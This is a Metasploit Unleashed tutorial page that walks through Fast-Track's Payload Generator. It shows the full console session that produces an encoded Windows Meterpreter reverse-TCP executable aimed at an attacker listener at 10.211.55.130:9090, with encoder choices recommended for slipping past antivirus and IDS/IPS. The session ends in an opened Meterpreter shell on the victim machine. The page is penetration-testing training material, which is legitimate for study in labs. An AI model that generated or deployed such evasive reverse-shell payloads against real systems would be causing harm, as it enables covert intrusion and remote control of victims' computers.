Payload Generator
From Metasploit Unleashed
The Fast Track Payload Generator will create custom Metasploit Payloads for you with a click of a button. Often though, remembering the commands with msfpayload can be tricky but Fast-Track's Payload Generator simplifies it for you!
Fast-Track Main Menu:
1. Fast-Track Updates
2. Autopwn Automation
3. Nmap Scripting Engine
4. Microsoft SQL Tools
5. Mass Client-Side Attack
6. Exploits
7. Binary to Hex Payload Converter
8. Payload Generator
9. Fast-Track Tutorials
10. Fast-Track Changelog
11. Fast-Track Credits
12. Exit Fast-Track
Enter the number: 8
The Metasploit Payload Generator is a simple tool to
make it extremely easy to generate a payload and listener
on the Metasploit framework. This does not actually
exploit any systems, it will generate a metasploit payload
for you and save it to an executable. You then need to
someone get it on the remote server by yourself and get it
to execute correctly.
This will also encode your payload to get past most AV and
IDS/IPS.
What payload do you want to generate:
Name: Description:
1. Windows Shell Reverse_TCP Spawn a command shell on victim and send back to attacker.
2. Windows Reverse_TCP Meterpreter Spawn a meterpreter shell on victim and send back to attacker.
3. Windows Reverse_TCP VNC DLL Spawn a VNC server on victim and send back to attacker.
4. Windows Bind Shell Execute payload and create an accepting port on remote system.
-c to Cancel
Enter choice (example 1-6): 2
Below is a list of encodings to try and bypass AV.
Select one of the below, Avoid_UTF8_tolower usually gets past them.
1. avoid_utf8_tolower
2. shikata_ga_nai
3. alpha_mixed
4. alpha_upper
5. call4_dword_xor
6. countdown
7. fnstenv_mov
8. jmp_call_additive
9. nonalpha
10. nonupper
11. unicode_mixed
12. unicode_upper
13. alpha2
14. No Encoding
Enter your choice : 2
Enter IP Address of the listener/attacker (reverse) or host/victim (bind shell): 10.211.55.130
Enter the port of the Listener: 9090
Do you want to create an EXE or Shellcode
1. Executable
2. Shellcode
Enter your choice: 1
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 310
Options: LHOST=10.211.55.130,LPORT=9090,ENCODING=shikata_ga_nai
A payload has been created in this directory and is named 'payload.exe'. Enjoy!
Do you want to start a listener to receive the payload yes or no: yes
Launching Listener...
***********************************************************************************************
Launching MSFCLI on 'exploit/multi/handler' with PAYLOAD='windows/meterpreter/reverse_tcp'
Listening on IP: 10.211.55.130 on Local Port: 9090 Using encoding: ENCODING=shikata_ga_nai
***********************************************************************************************
[*] Please wait while we load the module tree...
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...
Notice that once the payload is created, Fast-Track can automatically set up a listener for you to accept the connection. Now all you have to do is get the executable on the remote system itself. Once executed:
*********************************************************************************************** Launching MSFCLI on 'exploit/multi/handler' with PAYLOAD='windows/meterpreter/reverse_tcp' Listening on IP: 10.211.55.130 on Local Port: 9090 Using encoding: ENCODING=shikata_ga_nai *********************************************************************************************** [*] Please wait while we load the module tree... [*] Handler binding to LHOST 0.0.0.0 [*] Started reverse handler [*] Starting the payload handler... [*] Transmitting intermediate stager for over-sized stage...(216 bytes) [*] Sending stage (718336 bytes) [*] Meterpreter session 1 opened (10.211.55.130:9090 -> 10.211.55.128:1078) meterpreter >
We just learned how to easily create payloads using the Fast-Track framework and ultimately gain access to a system using a custom-created payload through the Metasploit Framework!
Beyond Metasploit > Fast-Track > Payload Generator
Fast Track Modes | Fast Track Updates | Fast Track Automation | Nmap Scripting Engine | MSSQL Injection | MSSQL Bruter | Binary to Hex | Mass-Client Attack | SQL Pwnage | Payload Generator
